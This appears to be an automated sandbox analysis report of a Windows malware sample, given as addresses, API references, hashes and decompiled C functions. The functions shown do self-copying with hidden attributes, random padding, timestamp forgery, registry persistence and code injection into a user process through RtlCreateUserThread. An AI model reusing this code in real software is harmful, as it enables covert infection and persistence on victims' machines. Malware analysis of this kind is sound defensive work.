    0x004058b2
    0x004058b2
    0x004058b7
    0x004058c0
    0x004058c2
    0x004058c4
    0x00405903
    0x00405903
    0x00405912
    0x00405918
    0x0040591b
    0x00405921
    0x00405923
    0x00405c30
    0x00405c30
    0x00405c33
    0x00405c38
    0x00405c38
    0x00405c3e
    0x00405c44
    0x00405c44
    0x00405929
    0x0040592e
    0x00405931
    0x00405936
    0x0040593c
    0x00405944
    0x00405946
    0x004059f2
    0x004059f2
    0x00405a00
    0x00405a0c
    0x00405a11
    0x00405a21
    0x00405a35
    0x00405a3b
    0x00405a43
    0x00405a44
    0x00405bae
    0x00405bb1
    0x00405bb6
    0x00405bb6
    0x00405bb9
    0x00405bd5
    0x00405bda
    0x00405be9
    0x00405bee
    0x00405bf0
    0x00405bff
    0x00405c0b
    0x00405c10
    0x00405c12
    0x00000000
    0x00000000
    0x00405bf9
    0x00405bf9
    0x00405c1e
    0x00405c1e
    0x00405c26
    0x00405c2b
    0x00405c2d
    0x00000000
    0x00000000
    0x00405c18
    0x00405c18
    0x00405c2f
    0x00000000
    0x00405c2f
    0x00405bbb
    0x00405bbe
    0x00405bc0
    0x00405bce
    0x00405bce
    0x00000000
    0x00405bbe
    0x00405a4a
    0x00405a56
    0x00405a6a
    0x00405a79
    0x00405a92
    0x00405a98
    0x00405a9b
    0x00405a9e
    0x00405b9d
    0x00405ba6
    0x00000000
    0x00405ba6
    0x00405aa9
    0x00405aaf
    0x00405ab1
    0x00405b1d
    0x00405b29
    0x00405b2f
    0x00405b3f
    0x00405b58
    0x00405b5e
    0x00405b60
    0x00405b63
    0x00405b72
    0x00405b87
    0x00405b8e
    0x00405b8e
    0x00405b97
    0x00000000
    0x00405b97
    0x00405abf
    0x00405ac2
    0x00405ac5
    0x00405ac7
    0x00405ad5
    0x00405ad5
    0x00405ac9
    0x00405ace
    0x00405ad0
    0x00405ad0
    0x00405ad7
    0x00405ad9
    0x00000000
    0x00405adb
    0x00405adb
    0x00405add
    0x00405adf
    0x00405afe
    0x00405aff
    0x00405b08
    0x00405b11
    0x00405b18
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00405ae1
    0x00405ae1
    0x00405af3
    0x00405af6
    0x00405af9
    0x00405afa
    0x00405afa
    0x00000000
    0x00405ae1
    0x00405ad9
    0x0040594c
    0x0040595a
    0x0040595f
    0x00405963
    0x0040597e
    0x00405988
    0x00405992
    0x00405995
    0x0040599a
    0x0040599f
    0x004059a0
    0x004059a1
    0x004059a2
    0x004059a3
    0x004059a6
    0x004059b4
    0x004059b6
    0x004059b9
    0x004059c8
    0x004059c8
    0x004059d0
    0x004059d5
    0x004059d7
    0x00000000
    0x00000000
    0x004059c2
    0x004059c2
    0x004059d9
    0x004059d9
    0x004059dd
    0x004059e0
    0x004059e5
    0x004059ed
    0x004059ed
    0x00000000
    0x004059e0
    0x004059a8
    0x004059aa
    0x004059ad
    0x00000000
    0x004059ad
    0x00405965
    0x0040596a
    0x00000000
    0x00000000
    0x0040596f
    0x00405976
    0x004058c6
    0x004058c8
    0x004058cd
    0x004058d0
    0x004058d5
    0x004058d7
    0x00000000
    0x00000000
    0x004058d9
    0x004058dc
    0x004058de
    0x004058e0
    0x004058fe
    0x004058fe
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004058e2
    0x004058e2
    0x004058e2
    0x004058e5
    0x004058e8
    0x004058ea
    0x004058ee
    0x004058f0
    0x004058f3
    0x004058f5
    0x004058f5
    0x004058f5
    0x004058f5
    0x004058f3
    0x004058ee
    0x004058f9
    0x004058fa
    0x004058fa
    0x00000000
    0x004058e2

    APIs
    • GetCommandLineA.KERNEL32 ref: 004058BA
    • CreateMutexW.KERNELBASE(00413468,00000001,?), ref: 00405912
    • GetLastError.KERNEL32 ref: 0040591B
    • CloseHandle.KERNEL32(?,?,00000001,00000000,00000000,00000000,00000000,?), ref: 0040596F
    • ExitProcess.KERNEL32 ref: 00405976
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseCommandCreateErrorExitHandleLastLineMutexProcess
    • String ID:
    • API String ID: 1529117804-0
    • Opcode ID: 21562199e360a4611aaa55f51b2fff2ebf0b0e195522c38ad02755bb6eb961cc
    • Instruction ID: afdad43edc00b5aade342eed858396e47c74ad5f2c68885408167c6f2e92136a
    • Opcode Fuzzy Hash: 21562199e360a4611aaa55f51b2fff2ebf0b0e195522c38ad02755bb6eb961cc
    • Instruction Fuzzy Hash: 79B16271900208AFDB21ABA0DD85EEF7B7DEF04304F00857AF601F61A1DB789E558B69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409968, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 134processCOMMON
    Download Yara Rule
    C-Code - Quality: 75%
    			E00409968(WCHAR* _a4) {
				long _v8;
				char _v520;
				short _v522;
				short _v524;
				short _v526;
				char _v528;
				short _v1048;
				long _v1076;
				void* _v1084;
				short _v1604;
				short _v2124;
				short _v2644;
				short _v3164;
				void* _t37;
				intOrPtr _t38;
				signed int _t41;
				struct tagPROCESSENTRY32W* _t47;
				void* _t53;
				WCHAR* _t59;
				void* _t62;
				long _t68;
				int _t74;
				void* _t76;
				void* _t78;
				void* _t80;

				_t37 = CreateToolhelp32Snapshot(2, 0); // executed
				_t76 = _t37;
				if(_t76 != 0xffffffff) {
					_v8 = 0x103;
					if(( *0x412af8 & 0x00000001) == 0) {
						_t38 =  *0x412a64; // 0x246f5a8
						lstrcpyW( &_v1604,  *(_t38 + 0x1c));
					} else {
						_t74 = GetUserNameW( &_v1604,  &_v8);
						if(_t74 == 0) {
							_v1604 = _t74;
						}
					}
					_t41 =  *0x412af8; // 0x0
					_v8 = 0;
					 *0x412a6c(0,  &_v3164,  !_t41 & 0x00000001 | 0x00000024, 1, _t78); // executed
					_t47 =  &_v1084;
					_v1084 = 0x22c;
					Process32FirstW(_t76, _t47); // executed
					while(_t47 != 0) {
						if(lstrcmpiW( &_v1048, _a4) != 0) {
							L22:
							_t47 = Process32NextW(_t76,  &_v1084); // executed
							continue;
						}
						_t80 = OpenProcess(0x410, 0, _v1076);
						if(_t80 == 0) {
							goto L22;
						}
						_t53 =  *0x412ba8(_t80, 0,  &_v528, 0x104); // executed
						if(_t53 == 0) {
							L21:
							CloseHandle(_t80);
							goto L22;
						}
						PathCombineW( &_v2124,  &_v3164, _a4);
						if(_v528 != 0x5c || _v526 != 0x3f || _v524 != 0x3f || _v522 != 0x5c) {
							_push( &_v2124);
							_t59 =  &_v528;
						} else {
							_push( &_v2124);
							_t59 =  &_v520;
						}
						if(lstrcmpiW(_t59, ??) != 0) {
							goto L21;
						} else {
							if(_v8 == 0) {
								_v8 = _v1076;
							}
							_t62 = E00409FAD(_t80,  &_v2644); // executed
							if(_t62 == 0 || lstrcmpiW( &_v2644,  &_v1604) != 0) {
								goto L21;
							} else {
								CloseHandle(_t80);
								CloseHandle(_t76);
								_t68 = _v1076;
								L25:
								return _t68;
							}
						}
					}
					CloseHandle(_t76);
					_t68 = _v8;
					goto L25;
				}
				return 0;
			}




























    0x00409978
    0x0040997e
    0x00409983
    0x00409993
    0x0040999a
    0x004099ba
    0x004099c9
    0x0040999c
    0x004099a7
    0x004099af
    0x004099b1
    0x004099b1
    0x004099af
    0x004099cf
    0x004099e8
    0x004099eb
    0x004099f1
    0x004099f9
    0x00409a03
    0x00409b10
    0x00409a20
    0x00409b02
    0x00409b0a
    0x00000000
    0x00409b0a
    0x00409a38
    0x00409a3c
    0x00000000
    0x00000000
    0x00409a50
    0x00409a58
    0x00409afb
    0x00409afc
    0x00000000
    0x00409afc
    0x00409a6f
    0x00409a7d
    0x00409ab2
    0x00409ab3
    0x00409a9d
    0x00409aa3
    0x00409aa4
    0x00409aa4
    0x00409ac2
    0x00000000
    0x00409ac4
    0x00409ac7
    0x00409acf
    0x00409acf
    0x00409ada
    0x00409ae1
    0x00000000
    0x00409b29
    0x00409b2a
    0x00409b31
    0x00409b37
    0x00409b22
    0x00000000
    0x00409b22
    0x00409ae1
    0x00409ac2
    0x00409b19
    0x00409b1f
    0x00000000
    0x00409b1f
    0x00000000

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409978
    • GetUserNameW.ADVAPI32(?,00000103), ref: 004099A7
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000001,?,?,00000000), ref: 004099EB
    • Process32FirstW.KERNEL32(00000000,?), ref: 00409A03
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00409B19
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00409B2A
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00409B31
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CloseHandle$CreateFirstFolderNamePathProcess32SnapshotSpecialToolhelp32User
    • String ID: ?$?$\$\
    • API String ID: 4249123633-2781376886
    • Opcode ID: c5cc35fa6dd9ffb52e5b7d73a40d5d0a8744a857888055b738d413ef26afa481
    • Instruction ID: cb4bd758d5f8b56318b6ec2644b8e39d8aafbc65a56d4eb30de1ad57ed799c34
    • Opcode Fuzzy Hash: c5cc35fa6dd9ffb52e5b7d73a40d5d0a8744a857888055b738d413ef26afa481
    • Instruction Fuzzy Hash: 35513371900119ABDB219FA0DD48EDEB7BCFB44314F0081A6E615E2191EBB89E94CF68
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040597C, Relevance: 28.7, APIs: 19, Instructions: 164filesleeptimeCOMMON
    Download Yara Rule
    C-Code - Quality: 91%
    			E0040597C() {
				DWORD* _t47;
				int _t52;
				signed int _t55;
				void* _t58;
				void* _t62;
				DWORD* _t63;
				void* _t64;
				DWORD* _t67;
				void* _t78;
				long _t81;
				DWORD* _t84;
				void* _t88;
				long _t101;
				struct _OVERLAPPED* _t109;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t116;
				void* _t117;
				void* _t118;

				GetModuleFileNameW(_t109, _t118 - 0x440, 0x104);
				E0040966F(_t118 - 0x238);
				_t47 =  *0x412a64; // 0x246f5a8
				PathCombineW(_t118 - 0x238, _t118 - 0x238, _t47[3]);
				_t52 = lstrcmpiW(_t118 - 0x440, _t118 - 0x238);
				_push(_t118 - 0x238);
				if(_t52 == 0) {
					 *(_t118 - 1) = _t109;
					E00409B88();
					goto L16;
				} else {
					E00409B88(); // executed
					E0040DD3C(_t118 - 0x238);
					CopyFileW(_t118 - 0x440, _t118 - 0x238, _t109); // executed
					SetFileAttributesW(_t118 - 0x238, 0x26); // executed
					_t78 = CreateFileW(_t118 - 0x238, 0x40000000, 1, _t109, 3, _t109, _t109); // executed
					 *(_t118 - 8) = _t78;
					if(_t78 == 0xffffffff) {
						L14:
						SetFileAttributesW(_t118 - 0x238, 0x21); // executed
						L16:
						if( *(_t118 - 1) == _t109) {
							_t55 =  *0x412af8; // 0x0
							_t110 =  *0x412a64; // 0x246f5a8
							_t58 = E00409968( *((intOrPtr*)(_t110 + (_t55 & 0x00000001 | 0x00000002) * 8))); // executed
							_t112 = _t58;
							_t114 = E0040605C;
							while(1) {
								_t62 = E00406DC4(0, _t110, _t114 -  *0x412bac, _t112); // executed
								__eflags = _t62;
								if(_t62 != 0) {
									break;
								}
								Sleep(0x14); // executed
							}
							while(1) {
								_t63 =  *0x412a64; // 0x246f5a8
								_t64 = E00409241(_t63[0xa]);
								__eflags = _t64;
								if(_t64 != 0) {
									break;
								}
								Sleep(0x14);
							}
							L25:
							if( *(_t118 - 0x14) != _t109) {
								CloseHandle( *(_t118 - 0x14));
							}
							E0040FB22(_t110, _t111);
							ExitProcess(_t109);
						}
						_t128 =  *((intOrPtr*)(_t118 - 9)) - _t109;
						if( *((intOrPtr*)(_t118 - 9)) != _t109) {
							_t67 =  *0x412a64; // 0x246f5a8
							E00409266(_t128, _t67[0xb], 0xa, _t109, _t109, _t109, _t109);
						}
						goto L25;
					}
					_t81 = SetFilePointer(_t78, _t109, _t109, 2); // executed
					if(_t81 == 0) {
						L11:
						 *0x412a6c(_t109, _t118 - 0x440, 0x25, 1);
						_t84 =  *0x412a64; // 0x246f5a8
						PathCombineW(_t118 - 0x440, _t118 - 0x440, _t84[0x17]);
						_t88 = CreateFileW(_t118 - 0x440, 0x80000000, 3, _t109, 3, _t109, _t109); // executed
						_t116 = _t88;
						if(_t116 != 0xffffffff) {
							GetFileTime(_t116, _t118 - 0x20, _t118 - 0x30, _t118 - 0x28);
							SetFileTime( *(_t118 - 8), _t118 - 0x20, _t118 - 0x30, _t118 - 0x28); // executed
							FindCloseChangeNotification(_t116); // executed
						}
						CloseHandle( *(_t118 - 8));
						goto L14;
					}
					_t101 = E0040DF51(0x400, 0x40) << 9;
					 *(_t118 - 0x10) = _t101;
					if(_t101 == _t109) {
						_t113 = 0;
						__eflags = 0;
					} else {
						_t113 = E0040CF2D(_t101);
						_t101 =  *(_t118 - 0x10);
					}
					if(_t113 == _t109) {
						goto L11;
					} else {
						_t117 = 0;
						if(_t101 <= _t109) {
							L10:
							_t110 = _t118 - 0x10;
							WriteFile( *(_t118 - 8), _t113, _t101, _t118 - 0x10, _t109); // executed
							FlushFileBuffers( *(_t118 - 8));
							E0040CF40(_t113);
							goto L11;
						} else {
							goto L9;
						}
						do {
							L9:
							 *((char*)(_t117 + _t113)) = E0040DF51(E0040DF51(0xff, 1), _t109);
							_t101 =  *(_t118 - 0x10);
							_t117 = _t117 + 1;
						} while (_t117 < _t101);
						goto L10;
					}
				}
			}
























    0x00405a00
    0x00405a0c
    0x00405a11
    0x00405a21
    0x00405a35
    0x00405a43
    0x00405a44
    0x00405bae
    0x00405bb1
    0x00000000
    0x00405a4a
    0x00405a4a
    0x00405a56
    0x00405a6a
    0x00405a79
    0x00405a92
    0x00405a98
    0x00405a9e
    0x00405b9d
    0x00405ba6
    0x00405bb6
    0x00405bb9
    0x00405bd5
    0x00405bda
    0x00405be9
    0x00405bee
    0x00405bf0
    0x00405bff
    0x00405c0b
    0x00405c10
    0x00405c12
    0x00000000
    0x00000000
    0x00405bf9
    0x00405bf9
    0x00405c1e
    0x00405c1e
    0x00405c26
    0x00405c2b
    0x00405c2d
    0x00000000
    0x00000000
    0x00405c18
    0x00405c18
    0x00405c2f
    0x00405c33
    0x00405c38
    0x00405c38
    0x00405c3e
    0x00405c44
    0x00405c44
    0x00405bbb
    0x00405bbe
    0x00405bc0
    0x00405bce
    0x00405bce
    0x00000000
    0x00405bbe
    0x00405aa9
    0x00405ab1
    0x00405b1d
    0x00405b29
    0x00405b2f
    0x00405b3f
    0x00405b58
    0x00405b5e
    0x00405b63
    0x00405b72
    0x00405b87
    0x00405b8e
    0x00405b8e
    0x00405b97
    0x00000000
    0x00405b97
    0x00405abf
    0x00405ac2
    0x00405ac7
    0x00405ad5
    0x00405ad5
    0x00405ac9
    0x00405ace
    0x00405ad0
    0x00405ad0
    0x00405ad9
    0x00000000
    0x00405adb
    0x00405adb
    0x00405adf
    0x00405afe
    0x00405aff
    0x00405b08
    0x00405b11
    0x00405b18
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00405ae1
    0x00405ae1
    0x00405af3
    0x00405af6
    0x00405af9
    0x00405afa
    0x00000000
    0x00405ae1
    0x00405ad9

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 00405A00
      • Part of subcall function 0040966F: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000001,00405A11,?,?), ref: 00409690
    • PathCombineW.SHLWAPI(?,?,?,?,?), ref: 00405A21
    • lstrcmpiW.KERNEL32(?,?,?,?), ref: 00405A35
    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,?), ref: 00405A6A
    • SetFileAttributesW.KERNELBASE(?,00000026,?,?), ref: 00405A79
    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00405A92
    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,?), ref: 00405AA9
    • WriteFile.KERNELBASE(?,00000000,00000000,?,00000000,00000040,?,?), ref: 00405B08
    • FlushFileBuffers.KERNEL32(?,?,?), ref: 00405B11
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000025,00000001,?,?), ref: 00405B29
    • PathCombineW.SHLWAPI(?,?,?,?,?), ref: 00405B3F
    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?), ref: 00405B58
    • GetFileTime.KERNEL32(00000000,?,?,?,?,?), ref: 00405B72
    • SetFileTime.KERNELBASE(?,?,?,?,?,?), ref: 00405B87
    • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 00405B8E
    • CloseHandle.KERNEL32(?,?,?), ref: 00405B97
    • SetFileAttributesW.KERNELBASE(?,00000021,?,?), ref: 00405BA6
    • Sleep.KERNELBASE(00000014,-0000CB50,00000000,0246F5A8,?,?,?), ref: 00405BF9
    • Sleep.KERNEL32(00000014,?,-0000CB50,00000000,?,?), ref: 00405C18
    • CloseHandle.KERNEL32(?), ref: 00405C38
    • ExitProcess.KERNEL32 ref: 00405C44
      • Part of subcall function 00409B88: RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,?), ref: 00409BBA
      • Part of subcall function 00409B88: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 00409BDD
      • Part of subcall function 00409B88: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 00409C16
      • Part of subcall function 00409B88: StrCmpNIW.SHLWAPI(00000002,?,?,?,?,00000000,?), ref: 00409C40
      • Part of subcall function 00409B88: RegCloseKey.KERNELBASE(?,?,?,00000000,?), ref: 00409CC2
      • Part of subcall function 0040DD3C: SetFileAttributesW.KERNELBASE(?,00000020,0040FBDD,?,?,?,00000000), ref: 0040DD42
      • Part of subcall function 0040DD3C: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040DD4C
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$ClosePath$AttributesCreate$CombineFolderHandleQuerySleepSpecialTimeValue$AllocateBuffersChangeCopyDeleteExitFindFlushHeapModuleNameNotificationPointerProcessWritelstrcmpi
    • String ID:
    • API String ID: 33030036-0
    • Opcode ID: 33bf17ffe01c7c61b2d112e788ced53d0e1631e07169bc4169b04aef3f45d040
    • Instruction ID: 8ee4a0294598f7fd352a5862a8919ac9f8de53975faecc9989b95bdeb2ef82e4
    • Opcode Fuzzy Hash: 33bf17ffe01c7c61b2d112e788ced53d0e1631e07169bc4169b04aef3f45d040
    • Instruction Fuzzy Hash: 0A512EB2900219AFDB21ABA0DD88EEF777CEB04304F004576F215F61A1DB789E558F69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409B88, Relevance: 12.1, APIs: 8, Instructions: 136registrystringCOMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E00409B88(WCHAR* _a4) {
				int _v8;
				void* _v12;
				int _v16;
				intOrPtr _t45;
				long _t46;
				intOrPtr _t48;
				intOrPtr _t52;
				int _t55;
				intOrPtr _t59;
				signed int _t61;
				intOrPtr _t71;
				signed int _t72;
				short _t74;
				int _t76;
				char* _t77;
				WCHAR* _t82;
				int _t84;
				char* _t85;
				signed int _t87;
				signed int _t88;

				_t76 = 0;
				_t84 = E0040D3D8(_a4);
				_t45 =  *0x412a64; // 0x246f5a8
				_v16 = _t84;
				_t46 = RegCreateKeyExW(0x80000002,  *(_t45 + 0x3c), 0, 0, 0, 3, 0,  &_v12, 0); // executed
				if(_t46 != 0) {
					L19:
					_t39 = _t84 + 2; // 0x2
					_t48 =  *0x412a64; // 0x246f5a8
					_t76 = E004075A2(0x80000001,  *((intOrPtr*)(_t48 + 0x40)),  *((intOrPtr*)(_t48 + 0x44)), 1, _a4, _t84 + _t39);
				} else {
					_t52 =  *0x412a64; // 0x246f5a8
					_v8 = 0;
					RegQueryValueExW(_v12,  *(_t52 + 0x44), 0, 0, 0,  &_v8); // executed
					_t55 = _v8 + 0xa + _t84 * 2;
					_v8 = _t55;
					if(_t55 != 0) {
						_t85 = E0040CF2D(_t55);
						if(_t85 != 0) {
							_t59 =  *0x412a64; // 0x246f5a8
							RegQueryValueExW(_v12,  *(_t59 + 0x44), 0, 0, _t85,  &_v8); // executed
							_t77 = _t85;
							_t82 = _t85;
							while(1) {
								_t61 =  *_t77 & 0x0000ffff;
								if(_t61 == 0 || _t61 == 0x2c) {
									goto L6;
								}
								L9:
								if( *_t77 == 0) {
									_t87 = E0040D3D8(_t85);
									if(_t87 > 0 && _t85[_t87 * 2 - 2] != 0x2c) {
										_t74 = 0x2c;
										 *(_t85 + _t87 * 2) = _t74;
										_t87 = _t87 + 1;
									}
									lstrcpyW(_t85 + _t87 * 2, _a4);
									_t88 = _t87 + _v16;
									lstrcpyW(_t85 + _t88 * 2, ",");
									_t71 =  *0x412a64; // 0x246f5a8
									_t72 = RegSetValueExW(_v12,  *(_t71 + 0x44), 0, 1, _t85, _t88 + _t88 + 4); // executed
									asm("sbb bl, bl");
									_t76 =  ~_t72 + 1;
								} else {
									_t77 =  &(_t77[2]);
									continue;
								}
								L16:
								E0040CF40(_t85);
								goto L17;
								L6:
								if(_t77 - _t82 >> 1 != _v16 || StrCmpNIW(_t82, _a4, _v16) != 0) {
									_t20 =  &(_t77[2]); // 0x4
									_t82 = _t20;
									goto L9;
								} else {
									_t76 = 1;
								}
								goto L16;
							}
						}
					}
					L17:
					RegCloseKey(_v12); // executed
					if(_t76 == 0) {
						_t84 = _v16;
						goto L19;
					}
				}
				return _t76;
			}























    0x00409b94
    0x00409b9e
    0x00409ba4
    0x00409bb2
    0x00409bba
    0x00409bc2
    0x00409ccf
    0x00409ccf
    0x00409cd7
    0x00409cee
    0x00409bc8
    0x00409bcc
    0x00409bd7
    0x00409bdd
    0x00409be6
    0x00409bea
    0x00409bef
    0x00409bfa
    0x00409bfe
    0x00409c08
    0x00409c16
    0x00409c1c
    0x00409c1e
    0x00409c20
    0x00409c20
    0x00409c26
    0x00000000
    0x00000000
    0x00409c4d
    0x00409c50
    0x00409c61
    0x00409c65
    0x00409c71
    0x00409c72
    0x00409c76
    0x00409c76
    0x00409c7e
    0x00409c84
    0x00409c90
    0x00409c9b
    0x00409cab
    0x00409cb5
    0x00409cb7
    0x00409c52
    0x00409c53
    0x00000000
    0x00409c53
    0x00409cb9
    0x00409cba
    0x00000000
    0x00409c2e
    0x00409c37
    0x00409c4a
    0x00409c4a
    0x00000000
    0x00409c56
    0x00409c56
    0x00409c56
    0x00000000
    0x00409c37
    0x00409c20
    0x00409bfe
    0x00409cbf
    0x00409cc2
    0x00409cca
    0x00409ccc
    0x00000000
    0x00409ccc
    0x00409cca
    0x00409cf6

    APIs
    • RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00000003,00000000,?,00000000,?,?,00000000,?), ref: 00409BBA
    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 00409BDD
    • RegCloseKey.KERNELBASE(?,?,?,00000000,?), ref: 00409CC2
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 00409C16
    • StrCmpNIW.SHLWAPI(00000002,?,?,?,?,00000000,?), ref: 00409C40
    • lstrcpyW.KERNEL32(00000000,?), ref: 00409C7E
    • lstrcpyW.KERNEL32(00000000,004035CC), ref: 00409C90
    • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,00000000,?,?,?,00000000,?), ref: 00409CAB
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Value$Querylstrcpy$AllocateCloseCreateHeap
    • String ID:
    • API String ID: 1578894565-0
    • Opcode ID: 4d5d90abaaafb1b023e0fc1cc6612c25230f583f733929d8fc14a37bc5d1eb55
    • Instruction ID: 6d28c95369a48019a3001f0bd64e3a18302ed4b8ca86750bd618c426f1ae961e
    • Opcode Fuzzy Hash: 4d5d90abaaafb1b023e0fc1cc6612c25230f583f733929d8fc14a37bc5d1eb55
    • Instruction Fuzzy Hash: B741AE36900115FFDB209B95CD48EEE7FB9EF05740B008066F505E72A1D7759A60CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409FAD, Relevance: 7.6, APIs: 5, Instructions: 62COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00409FAD(long _a4, union _SID_NAME_USE _a8) {
				void* _v8;
				short _v528;
				int _t26;
				int _t32;
				union _TOKEN_INFORMATION_CLASS _t33;
				void* _t35;

				_t33 = 0;
				if(OpenProcessToken(_a4, 8,  &_v8) != 0) {
					_a4 = 0;
					GetTokenInformation(_v8, 1, 0, 0,  &_a4); // executed
					_t22 = _a4;
					if(_a4 != 0) {
						_t35 = E0040CF2D(_t22);
						if(_t35 != 0) {
							_t26 = GetTokenInformation(_v8, 1, _t35, _a4,  &_a4); // executed
							if(_t26 != 0) {
								_a4 = 0x103;
								_t32 = LookupAccountSidW(0,  *_t35, _a8,  &_a4,  &_v528,  &_a4,  &_a8); // executed
								if(_t32 != 0) {
									_t33 = 1;
								}
							}
							E0040CF40(_t35);
						}
					}
					FindCloseChangeNotification(_v8); // executed
				}
				return _t33;
			}









    0x00409fc0
    0x00409fca
    0x00409fd7
    0x00409fda
    0x00409fe0
    0x00409fe5
    0x00409fed
    0x00409ff1
    0x0040a000
    0x0040a008
    0x0040a020
    0x0040a02a
    0x0040a032
    0x0040a034
    0x0040a034
    0x0040a032
    0x0040a037
    0x0040a037
    0x0040a03c
    0x0040a040
    0x0040a040
    0x0040a04a

    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,00000000,00000000), ref: 00409FC2
    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 00409FDA
    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040A040
      • Part of subcall function 0040CF2D: RtlAllocateHeap.NTDLL(00000008,?,0040952C), ref: 0040CF39
    • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?,00000000), ref: 0040A000
    • LookupAccountSidW.ADVAPI32(00000000,00000000,?,?,?,?,?), ref: 0040A02A
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Token$Information$AccountAllocateChangeCloseFindHeapLookupNotificationOpenProcess
    • String ID:
    • API String ID: 3037326660-0
    • Opcode ID: bf001143671df6213e7da5d7fb84f9aed90da88c7777e9060486259687600fed
    • Instruction ID: 99342f0340d474e00ae288eb69932813939a730ba8887bc0699888d773cf2937
    • Opcode Fuzzy Hash: bf001143671df6213e7da5d7fb84f9aed90da88c7777e9060486259687600fed
    • Instruction Fuzzy Hash: 7C11DD7610020CBFDB219F90DD85EDF7BADEF04380F108136B905EA191D775DA549BA5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00406DC4, Relevance: 4.6, APIs: 3, Instructions: 52threadCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00406DC4(void* __eax, void* __ecx, intOrPtr _a4, long _a8) {
				char _v5;
				char _v6;
				void* _t11;
				intOrPtr _t12;
				void* _t23;

				_t23 = __eax;
				_v5 = 1;
				_v6 = 0;
				if(__eax != 0) {
					L4:
					_t11 = E00406689(_t23); // executed
					if(_t11 != 0 && RtlCreateUserThread(_t23, 0, 0, 0, 0, 0, _t11 + _a4, 0, 0, 0) == 0) {
						_v6 = 1;
					}
					if(_v5 == 0) {
						FindCloseChangeNotification(_t23); // executed
					}
					_t12 = _v6;
				} else {
					_v5 = 0;
					if(_a8 == 0) {
						L3:
						_t12 = 0;
					} else {
						_t23 = OpenProcess(0x43a, 0, _a8);
						if(_t23 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				return _t12;
			}








    0x00406dcc
    0x00406dce
    0x00406dd2
    0x00406dd7
    0x00406dfa
    0x00406dfb
    0x00406e02
    0x00406e1d
    0x00406e1d
    0x00406e24
    0x00406e27
    0x00406e27
    0x00406e2d
    0x00406dd9
    0x00406dd9
    0x00406ddf
    0x00406df6
    0x00406df6
    0x00406de1
    0x00406df0
    0x00406df4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00406df4
    0x00406ddf
    0x00406e33

    APIs
    • OpenProcess.KERNEL32(0000043A,00000000,?,0040605C,00000000,?,?,00405C10,-0000CB50,00000000,0246F5A8,?,?,?), ref: 00406DEA
    • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00406E13
    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,0040605C,00000000,?,?,00405C10,-0000CB50,00000000,0246F5A8,?,?,?), ref: 00406E27
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ChangeCloseCreateFindNotificationOpenProcessThreadUser
    • String ID:
    • API String ID: 307445780-0
    • Opcode ID: b2196cc7b70a747e3e9d0d8dbe1991aa683add7a991206fe8cd9dad19a738dd0
